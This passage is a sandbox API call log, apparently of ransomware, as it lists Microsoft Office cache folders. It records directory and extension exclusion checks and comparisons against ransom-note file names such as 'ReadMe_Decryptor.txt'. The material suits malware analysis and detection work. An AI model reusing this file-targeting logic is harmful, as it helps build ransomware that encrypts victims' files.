lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\", lpString2="{90140000-001B-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C" [0107.404] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0107.404] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.404] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.404] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0107.404] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0107.404] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0107.404] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0107.404] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0107.404] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0107.404] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0107.404] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0107.405] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0107.405] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\Intel") returned 1 [0107.405] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\msys32") returned -1 [0107.405] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\Qt") returned -1 [0107.405] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0107.405] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files") returned -1 [0107.405] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0107.405] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files (x86)") returned -1 [0107.405] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\") returned="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\" [0107.405] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\") returned 63 [0107.405] FindFirstFileExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758dc8 [0107.406] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0107.406] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0107.406] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0107.406] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0107.406] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0107.407] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0107.407] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0107.407] lstrcmpiW (lpString1="Setup.xml", lpString2="ReadMe_Decryptor.txt") returned 1 [0107.407] lstrcmpiW (lpString1="Setup.xml", lpString2="Decryptor_Info.hta") returned 1 [0107.407] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0107.407] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0107.407] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0107.407] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0107.407] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0107.407] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0107.407] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.407] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.407] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.407] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3e30 [0107.407] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.407] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc967850, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x29c6dbd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordLR.cab", cAlternateFileName="")) returned 1 [0107.407] lstrcmpW (lpString1="WordLR.cab", lpString2=".") returned 1 [0107.407] lstrcmpW (lpString1="WordLR.cab", lpString2="..") returned 1 [0107.407] lstrcmpiW (lpString1="WordLR.cab", lpString2="ReadMe_Decryptor.txt") returned 1 [0107.407] lstrcmpiW (lpString1="WordLR.cab", lpString2="Decryptor_Info.hta") returned 1 [0107.407] PathFindExtensionW (pszPath="WordLR.cab") returned=".cab" [0107.408] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0107.408] lstrcmpiW (lpString1=".cab", lpString2=".sys") returned -1 [0107.408] lstrcmpiW (lpString1=".cab", lpString2=".lnk") returned -1 [0107.408] lstrcmpiW (lpString1=".cab", lpString2=".dll") returned -1 [0107.408] lstrcmpiW (lpString1=".cab", lpString2=".msi") returned -1 [0107.408] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.408] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.408] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.408] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3ed8 [0107.408] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.408] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x267e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordMUI.msi", cAlternateFileName="")) returned 1 [0107.408] lstrcmpW (lpString1="WordMUI.msi", lpString2=".") returned 1 [0107.408] lstrcmpW (lpString1="WordMUI.msi", lpString2="..") returned 1 [0107.408] lstrcmpiW (lpString1="WordMUI.msi", lpString2="ReadMe_Decryptor.txt") returned 1 [0107.408] lstrcmpiW (lpString1="WordMUI.msi", lpString2="Decryptor_Info.hta") returned 1 [0107.408] PathFindExtensionW (pszPath="WordMUI.msi") returned=".msi" [0107.408] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0107.408] lstrcmpiW (lpString1=".msi", lpString2=".sys") returned -1 [0107.408] lstrcmpiW (lpString1=".msi", lpString2=".lnk") returned 1 [0107.408] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0107.409] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0107.409] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 1 [0107.409] lstrcmpW (lpString1="WordMUI.xml", lpString2=".") returned 1 [0107.409] lstrcmpW (lpString1="WordMUI.xml", lpString2="..") returned 1 [0107.409] lstrcmpiW (lpString1="WordMUI.xml", lpString2="ReadMe_Decryptor.txt") returned 1 [0107.409] lstrcmpiW (lpString1="WordMUI.xml", lpString2="Decryptor_Info.hta") returned 1 [0107.409] PathFindExtensionW (pszPath="WordMUI.xml") returned=".xml" [0107.409] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0107.409] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0107.409] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0107.409] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0107.409] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0107.409] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.409] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.409] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.409] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3f80 [0107.409] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.409] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 0 [0107.410] FindClose (in: hFindFile=0x758dc8 | out: hFindFile=0x758dc8) returned 1 [0107.410] FindNextFileW (in: hFindFile=0x758d08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-002C-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92787~1")) returned 1 [0107.410] lstrcmpW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0107.410] lstrcmpW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0107.410] lstrlenW (lpString="{90140000-002C-0409-1000-0000000FF1CE}-C") returned 40 [0107.410] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\", lpString2="{90140000-002C-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C" [0107.410] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0107.410] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.410] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.410] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0107.410] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0107.410] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0107.410] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0107.410] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0107.410] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0107.410] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0107.410] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0107.411] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0107.411] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\Intel") returned 1 [0107.411] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\msys32") returned -1 [0107.411] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\Qt") returned -1 [0107.411] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0107.411] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files") returned -1 [0107.411] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0107.411] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files (x86)") returned -1 [0107.411] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\" [0107.411] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\") returned 63 [0107.411] FindFirstFileExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758dc8 [0107.570] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0107.570] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0107.572] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0107.572] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0107.572] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.en", cAlternateFileName="")) returned 1 [0107.572] lstrcmpW (lpString1="Proof.en", lpString2=".") returned 1 [0107.572] lstrcmpW (lpString1="Proof.en", lpString2="..") returned 1 [0107.572] lstrlenW (lpString="Proof.en") returned 8 [0107.572] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpString2="Proof.en" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en" [0107.572] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\Windows") returned -1 [0107.572] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.572] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.572] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\ProgramData") returned -1 [0107.572] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0107.573] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0107.573] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0107.573] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0107.573] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0107.573] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0107.573] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0107.573] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0107.573] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\Intel") returned 1 [0107.573] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\msys32") returned -1 [0107.573] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\Qt") returned -1 [0107.573] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\ProgramData") returned -1 [0107.573] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\Program Files") returned -1 [0107.573] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\Windows") returned -1 [0107.573] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\Program Files (x86)") returned -1 [0107.573] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="\\" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\" [0107.573] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\") returned 72 [0107.573] FindFirstFileExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758e08 [0107.574] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0107.574] FindNextFileW (in: hFindFile=0x758e08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0107.575] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0107.575] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0107.575] FindNextFileW (in: hFindFile=0x758e08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x219b4a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x219b4a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf07b1ad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xaf35ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0107.575] lstrcmpW (lpString1="Proof.cab", lpString2=".") returned 1 [0107.575] lstrcmpW (lpString1="Proof.cab", lpString2="..") returned 1 [0107.575] lstrcmpiW (lpString1="Proof.cab", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.575] lstrcmpiW (lpString1="Proof.cab", lpString2="Decryptor_Info.hta") returned 1 [0107.575] PathFindExtensionW (pszPath="Proof.cab") returned=".cab" [0107.575] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0107.575] lstrcmpiW (lpString1=".cab", lpString2=".sys") returned -1 [0107.575] lstrcmpiW (lpString1=".cab", lpString2=".lnk") returned -1 [0107.575] lstrcmpiW (lpString1=".cab", lpString2=".dll") returned -1 [0107.575] lstrcmpiW (lpString1=".cab", lpString2=".msi") returned -1 [0107.575] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3b90 [0107.575] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x712290 [0107.575] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a3b90 | out: hHeap=0x6d0000) returned 1 [0107.575] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9ee8 [0107.575] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712290 | out: hHeap=0x6d0000) returned 1 [0107.575] FindNextFileW (in: hFindFile=0x758e08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4db6cb00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x4db6cb00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf020c5d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0107.576] lstrcmpW (lpString1="Proof.msi", lpString2=".") returned 1 [0107.576] lstrcmpW (lpString1="Proof.msi", lpString2="..") returned 1 [0107.576] lstrcmpiW (lpString1="Proof.msi", 